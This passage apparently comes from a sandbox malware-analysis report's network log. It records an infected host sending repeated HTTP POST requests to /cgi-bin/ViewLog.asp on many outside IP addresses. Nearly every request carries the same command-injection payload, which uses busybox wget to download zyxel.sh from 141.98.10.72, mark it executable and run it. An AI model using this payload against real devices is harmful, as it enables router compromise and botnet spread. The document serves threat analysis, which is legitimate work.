                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:51.065562010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:52.313477039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:54.969425917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:00.089227915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:10.072951078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.064503908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:12.023142099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      408192.168.2.155015262.48.200.2178080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.439281940 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:50.653127909 CET495INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:49 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 288
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 192.168.0.14 Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      409192.168.2.156098294.110.210.798080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.446893930 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      410192.168.2.155646295.64.176.2348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.464442015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:50.744344950 CET604INHTTP/1.1 404
                                                      Vary: Origin
                                                      Vary: Access-Control-Request-Method
                                                      Vary: Access-Control-Request-Headers
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: 0
                                                      X-Frame-Options: DENY
                                                      Content-Disposition: inline;filename=f.txt
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Date: Wed, 14 Feb 2024 08:29:51 GMT
                                                      Keep-Alive: timeout=60
                                                      Connection: keep-alive
                                                      Data Raw: 37 39 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 32 2d 31 34 54 30 38 3a 32 39 3a 35 31 2e 32 37 35 2b 30 30 3a 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a
                                                      Data Ascii: 79{"timestamp":"2024-02-14T08:29:51.275+00:00","status":404,"error":"Not Found","message":"","path":"/cgi-bin/ViewLog.asp"}


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      411192.168.2.154181894.120.211.2488080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.472856045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      412192.168.2.153283494.120.3.1148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.473370075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      413192.168.2.153838031.200.62.2098080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.474628925 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      414192.168.2.153387831.200.90.268080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.479384899 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      415192.168.2.154773095.86.66.1428080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.481355906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      416192.168.2.153362031.136.233.2398080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.649065018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:51.321542025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:52.665466070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:55.481657982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:00.857239962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:11.608999968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.112282038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119142056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      417192.168.2.155550631.136.232.288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.660676003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:51.353494883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:52.697446108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:55.481573105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:00.857261896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:11.608980894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
